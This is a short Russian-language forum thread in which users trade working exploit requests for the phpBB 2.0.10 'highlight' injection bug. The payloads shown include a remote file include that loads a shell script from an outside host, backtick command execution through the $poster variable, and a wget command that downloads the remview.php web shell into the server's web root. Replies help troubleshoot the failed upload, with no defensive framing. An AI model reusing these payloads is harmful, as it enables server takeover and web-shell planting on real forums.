В общем, необходимо взломать форум phpbb 2.0.10 путём эксплуатации баги в highlight.
Мне не нужно взламывать конкретный форум, просто хочу научиться использовать эту багу.
k1borg, спасибо! Ты мне помог, опираясь на твою подсказку я нашёл де-то на других форумах другой код. Но теперь возникла другая проблема. Например, делаю такой запрос:
попробуй воспользоваться поиском по форуму, уверен тем с таким содержанием не один десяток, а так возможно запрешено выполнение системных команд в php, пробуй инклюдинг - &test=http://site.com/shell.txt?&highlight=%2527.include($_GET[test]).%2527
__________________
Дайте мне точку опоры и я переверну землю!
Еще вопрос:
Почему после того как я ввожу &highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l
Все ОК
Потом: viewtopic.php?p=61259&highlight=%2527.$poster=%60$ cmd%60.%2527&cmd=wget%20http://сайт.narod.ru/remview.php%20-P%20/usr/local/www/http/
и тут все начинаеться пишет: )\b#i
при заливке wget'ом так оно и будет, а если не заливается - возможно wget не установлен на сервере или нет прав на запись
Цитата:
Сообщение от Extrim
Смотрю в viewtopic.php?p=61259&highlight=%2527.$poster=%60$ cmd%60.%2527&cmd=ls usr/local/www/http
И файлика чвоего не наблюдаю почемуто это так ????
его там может и не быть
__________________
Дайте мне точку опоры и я переверну землю!